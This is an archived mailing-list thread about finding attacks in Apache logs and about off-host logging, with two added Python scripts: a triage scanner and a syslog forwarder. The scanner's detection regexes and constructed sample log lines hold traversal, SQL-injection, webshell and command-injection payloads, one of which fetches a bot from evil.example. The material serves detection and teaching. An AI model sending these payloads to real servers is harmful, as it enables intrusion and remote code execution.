Linux Archive (http://www.linux-archive.org/)
Red Hat Linux: forensic Apache log analysis

Georgios Magklaras 07-27-2011 09:33 AM

forensic Apache log analysis
 
On 07/27/2011 08:24 AM, ESGLinux wrote:

Hi All,

I have a problem with a RHEL server and I want to ask you for some advice.
I'm not a security expert so I don't know which can be the best approach to
solve my problem.

The problem is that I have several gigabytes of Apache logs and I need to
look for attacks in them to check if the server has been compromised.

I can manually check some possible attack URLs by looking for them in the
logs, but I'm sure there must be tools or techniques to do this the
correct way.

So, any idea that can help me?

Thank you very much in advance,

ESG
The tools the others suggested are fine; however, the usual culprit
with this approach is that you should not rely on the application logs:
experience often shows that logs that stay on the suspected compromised
system might be tampered with or compromised. This is contrary to the idea of
forensics, where you should have at a minimum something off the client
system to ensure some level of confidence in a post-mortem examination.


In the future, please do take a look at LUARM:
http://luarm.sourceforge.net/ .

Make sure you get the latest version of it from svn by doing a:

svn co https://luarm.svn.sourceforge.net/svnroot/luarm luarm

and then follow the README for setup instructions. A case where I used
LUARM to detect a botnet-compromised LAMP is here:

http://epistolatory.blogspot.com/2011/02/catching-undesired-guest-in-penguin-tmp.html

Please do feel free to pass feedback.

GM

--
George Magklaras PhD
RHCE no: 805008309135525

Senior Systems Engineer/IT Manager
Biotek Center, University of Oslo
EMBnet TMPC Chair

http://folk.uio.no/georgios

Tel: +47 22840535

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
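The triage the question asks for, as an added example (not code from the thread, and not part of LUARM): a Python script that streams a combined-format access_log, percent-decodes each request so encoded and double-encoded payloads are not missed, tags requests with the indicator classes they match, and counts flagged requests per client IP, noting separately those the server answered with 2xx. The indicator patterns are a starting set of my own, the file name triage.py is assumed, and the sample log lines at the bottom are constructed (RFC 5737 documentation addresses).

```python
#!/usr/bin/env python3
"""Triage Apache combined-format access logs for attack indicators.

Added example, not code from the thread.  Streams the log (gigabytes are
fine), percent-decodes requests so encoded payloads are not missed, tags
each request with the indicator classes it matches and counts flagged
requests per client, noting those answered 2xx (a probe that got 404 is
noise; one that got 200 may be a hit).  Sample lines are constructed.
"""
import re
import sys
import urllib.parse
from collections import Counter, defaultdict

# LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?')

# Indicator classes, matched against the decoded request line, Referer and
# User-Agent together (payloads turn up in all three).  A starting set only.
INDICATORS = {
    "traversal": re.compile(r"\.\./|/etc/passwd|/proc/self/environ", re.I),
    "sqli": re.compile(r"union\s+(all\s+)?select|'\s*or\s+\d+\s*=\s*\d+|information_schema|sleep\(\d", re.I),
    "cmdinj": re.compile(r"[;|`]\s*(wget|curl|sh|bash|perl|python|nc)\b|/bin/(ba)?sh", re.I),
    "rfi": re.compile(r"[?&]\w+=(https?|ftp)://", re.I),
    "webshell": re.compile(r"/(c99|r57|wso|shell|cmd)\.php|[?&]cmd=", re.I),
}

def decode(s):
    """Percent-decode until stable, so %252e-style double encoding is caught."""
    prev = None
    for _ in range(3):
        if s == prev:
            break
        prev, s = s, urllib.parse.unquote_plus(s)
    return s

def parse_line(line):
    """Fields of one combined-format line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def classify(entry):
    """Indicator classes the parsed request matches (empty list if clean)."""
    hay = " ".join(decode(entry.get(k) or "") for k in ("request", "referer", "agent"))
    return [name for name, rx in INDICATORS.items() if rx.search(hay)]

def scan(lines):
    """Return (hits, per_ip, malformed): flagged entries with tags, per-client
    counters of flagged and 2xx-answered requests, count of unparseable lines."""
    hits, per_ip, malformed = [], defaultdict(Counter), 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            malformed += 1
            continue
        tags = classify(entry)
        if not tags:
            continue
        hits.append((entry, tags))
        per_ip[entry["ip"]]["flagged"] += 1
        if 200 <= entry["status"] < 300:
            per_ip[entry["ip"]]["succeeded"] += 1
    return hits, per_ip, malformed

def report(hits, per_ip, malformed, out=sys.stdout):
    for entry, tags in hits:
        out.write(f'{entry["ip"]:<15} {entry["status"]} {",".join(tags):<10} {entry["request"]}\n')
    out.write("\nflagged requests per client (succeeded = answered 2xx):\n")
    for ip, c in sorted(per_ip.items(), key=lambda kv: -kv[1]["succeeded"]):
        out.write(f'  {ip:<15} flagged={c["flagged"]:<3} succeeded={c["succeeded"]}\n')
    out.write(f"\n{malformed} line(s) did not parse as combined format\n")

# Constructed sample; RFC 5737 documentation addresses, not real traffic.
SAMPLE = """\
203.0.113.5 - - [27/Jul/2011:08:01:12 +0200] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Jul/2011:08:01:13 +0200] "GET /index.php?page=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Jul/2011:08:01:20 +0200] "GET /index.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 2210 "-" "sqlmap/1.0"
198.51.100.7 - - [27/Jul/2011:08:02:01 +0200] "GET /wp-content/uploads/c99.php?cmd=id HTTP/1.1" 200 311 "-" "-"
198.51.100.7 - - [27/Jul/2011:08:02:09 +0200] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget%20http://evil.example/bot HTTP/1.1" 200 88 "-" "-"
198.51.100.7 - - [27/Jul/2011:08:02:30 +0200] "GET /index.php?inc=http://evil.example/sh.txt HTTP/1.1" 500 0 "-" "-"
192.0.2.9 - - [27/Jul/2011:08:03:00 +0200] "GET /about.html HTTP/1.1" 200 4096 "http://www.example.org/" "Mozilla/5.0"
192.0.2.9 - - [27/Jul/2011:08:03:05 +0200] "GET /style.css HTTP/1.1" 304 - "-" "Mozilla/5.0"
garbage line that does not parse
"""

if __name__ == "__main__":
    # triage.py access_log [more logs...]; with no argument it runs the sample.
    if len(sys.argv) > 1:
        import fileinput
        report(*scan(fileinput.input(sys.argv[1:])))
    else:
        report(*scan(SAMPLE.splitlines()))
```

Run it as `triage.py /var/log/httpd/access_log*` against the copy of the logs you trust, and read the per-client summary first: a client whose flagged requests were answered with 2xx (the double-encoded traversal and the c99.php request in the sample) is where to start looking on the host, while a run of 404s is ordinary scanner noise. The pattern set is deliberately small; a second pass with the tools suggested elsewhere in the thread, or with extra patterns for the application actually deployed, is expected.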

ESGLinux 07-27-2011 09:46 AM

forensic Apache log analysis
 
hi,

This looks interesting. As you say, for my actual problem it is not a
solution, but it is interesting to use on other systems.

My logs, I think, aren't compromised because they are not stored on the
same machine that is running Apache. So I think I can rely on them...

greetings and thanks for your help

ESG


Saqib Ilyas 07-27-2011 02:32 PM

forensic Apache log analysis
 
Attackers with reasonable experience tend to mess with the application and
system logs of the compromised machine. George's point is that logs on a
compromised system (which you say in the second paragraph below is your
case) are not to be taken as reliable. As an alternative, Apache could store
logs on a different machine over, perhaps, syslog. That way, if the Apache
machine is compromised, it does not necessarily mean that the log server is
also compromised, and hence the logs are more reliable.
But, of course, what he has suggested is for the future.

--
Muhammad Saqib Ilyas
PhD Student, Computer Science and Engineering
Lahore University of Management Sciences
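The off-host logging suggested above, as an added example that is not from the thread: Apache can hand each access-log line to a program instead of a file (piped logging, the `CustomLog "|program"` form), and this script takes those lines on stdin, wraps each in an RFC 3164 syslog frame and sends it by UDP to a collector, so a copy of the log exists off the web server from the moment it is written. The script path, the collector name `loghost.example.org` and the local6 facility are assumptions; the framing follows RFC 3164.

```python
#!/usr/bin/env python3
"""Ship Apache access-log lines to a remote syslog collector as they are written.

Added example, not from the thread.  Assumed Apache directive:

    CustomLog "|/usr/local/bin/apache_to_syslog.py loghost.example.org" combined

Apache starts this program once, keeps it running for the life of the server
and writes every log line to its stdin; each line becomes one UDP packet
<PRI>Mmm dd hh:mm:ss HOSTNAME TAG: MSG on port 514 of the collector.
"""
import socket
import sys
import time
from typing import Callable, Iterable, List, Optional

FACILITY_LOCAL6 = 22   # syslog facility number for local6 (assumed choice)
SEVERITY_INFO = 6
SYSLOG_PORT = 514


def syslog_frame(message: str, hostname: str, tag: str = "httpd",
                 facility: int = FACILITY_LOCAL6, severity: int = SEVERITY_INFO,
                 now: Optional[float] = None) -> bytes:
    """Build one RFC 3164 packet for `message`.

    PRI is facility*8 + severity; the day of month is space padded as the
    RFC requires.  Newlines are removed so one log line is exactly one packet.
    """
    t = time.localtime(now)
    stamp = "%s %2d %s" % (time.strftime("%b", t), t.tm_mday,
                           time.strftime("%H:%M:%S", t))
    pri = facility * 8 + severity
    body = message.rstrip("\r\n").replace("\n", " ")
    return f"<{pri}>{stamp} {hostname} {tag}: {body}".encode("utf-8", "replace")


def forward(lines: Iterable[str], send: Callable[[bytes], object],
            hostname: str) -> int:
    """Frame and send every non-empty line through `send`; return the count."""
    sent = 0
    for line in lines:
        if not line.strip():
            continue
        send(syslog_frame(line, hostname))
        sent += 1
    return sent


def main(argv: List[str]) -> int:
    if len(argv) != 2:
        sys.stderr.write(f"usage: {argv[0]} COLLECTOR_HOST\n")
        return 2
    collector = (argv[1], SYSLOG_PORT)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Apache closes our stdin on shutdown, which ends the loop.
    forward(sys.stdin, lambda frame: sock.sendto(frame, collector),
            socket.gethostname())
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The collector has to accept syslog over the network (with rsyslog, the imudp or imtcp input) before this is useful, and the same directive with `/usr/bin/logger -t httpd -p local6.info` in place of the script does the job with no code at all. Two caveats matter for evidence: UDP syslog is neither reliable nor authenticated, so a TCP transport with TLS (RFC 5425) or rsyslog's RELP is the better choice for the real deployment, and the remote copy only protects the lines written before the attacker gains control of the web server; nothing logged afterwards by a compromised host should be trusted more than the host itself.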
